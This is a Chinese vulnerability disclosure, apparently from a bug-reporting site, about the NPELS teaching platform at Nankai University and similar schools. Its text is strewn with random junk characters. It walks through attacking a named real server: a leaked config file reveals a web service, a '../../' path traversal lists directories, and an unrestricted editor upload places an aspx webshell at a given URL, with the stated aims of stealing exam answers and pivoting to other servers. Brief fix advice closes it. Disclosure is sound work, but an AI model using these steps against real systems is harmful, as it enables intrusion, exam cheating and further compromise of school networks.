好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中% \7 L3 F9 T/ r/ W2 E
$ V G4 [( r* t# |. K: X$ F详细说明:3 O( r3 I# q& D- f
! d3 [! r% p# Z2 k以南开大学的为例:
+ f: t) j6 n* b4 M, P+ ^- j5 B! Ahttp://222.30.60.3/NPELS S4 s5 d. r8 y) w; s; k
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
& U1 k7 L$ M% A$ M: {; \<setting name="Update_CommonSvr_CommonService" serializeAs="String">" G/ Y8 u' \4 ?4 e' O+ C5 C
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
' i9 Z$ J) F" P5 j</setting>
& @. D; E6 D7 O$ L# t0 W: U及版本号1 }$ `2 d1 ]* o( j8 a3 K
<add key="TVersion" value="1, 0, 0, 2187">
3 j& }1 F; t" M* n/ h</add>6 |! S% ]8 t3 D& J ~
直接访问% g7 |8 b6 V* \) O
http://222.30.60.3/NPELS/CommonService.asmx' Q5 p4 o9 \' [ E3 V6 q" y3 N4 y7 M
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
( p7 n V, a9 P, O J% Mhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187( p( ^9 X. U' u. e% H
进一步列目录(返回的网页很大,可以直接 wget 下来)
) {8 s5 C7 \4 {/ y0 g! \http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 g7 K1 ], y8 v! z% S" t" L3 J2 G- h9 v
5 F: Y6 m+ X2 g8 |发现
3 [8 X# e1 L- m! `. ^http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 x3 H8 `. B j' e1 `可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
1 |( u# M) L+ S8 r, z8 z/ W; i& C上传后继续列目录找到木马地址直接访问即可
9 p2 O3 s! \: g+ C+ X% ~ ! F8 r4 b1 ?: c4 w- y m3 Z
OOXX- V' \, d& v' Q* M) ^
}: ]; B+ [$ n [+ bGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
5 \0 ]+ X, i( B$ B' _漏洞证明:- ?& V( N8 r1 o8 l; D; r: ?
2 J, e# X. e, m) v7 @! u
列目录:# c% U2 f% n6 M0 ?
http://222.30.60.3/NPELS/CommonS ... List?version=../../
* ?& i1 m% J' p9 g5 X文件上传:+ r+ P: z& m7 V
http://222.30.60.3/npelsv/editor/editor.htm: H- O4 o* }6 l& j- J
0 y+ Z, K" m# P3 Z) `. g$ W/ d上传木马:
" F( c8 _- B4 j) N* shttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx* E& \2 p; |9 V* X0 l
* P: f& G, h0 s+ @% n2 I9 s5 E. [
修复方案:
, ?; L+ H. `3 n0 y% q o. z7 _; h好像考试系统必须使用 CommonService.asmx
/ n" Q2 T! R! [2 N U最好配置文件加密或者用别的方式不让它泄露出来
4 l. @) Z2 U- m8 J2 e并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
& c7 V' ~" _! ~1 v |